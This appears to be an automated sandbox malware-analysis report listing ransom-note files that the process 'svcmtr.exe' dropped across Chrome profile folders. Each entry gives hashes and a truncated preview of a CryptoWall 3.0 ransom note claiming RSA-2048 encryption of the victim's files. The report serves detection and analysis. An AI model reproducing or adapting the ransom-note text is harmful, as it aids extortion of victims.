                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\8167\_metadata\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\8167\_metadata\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\8167\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\8167\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateTransparency\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateTransparency\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\_metadata\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\_metadata\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
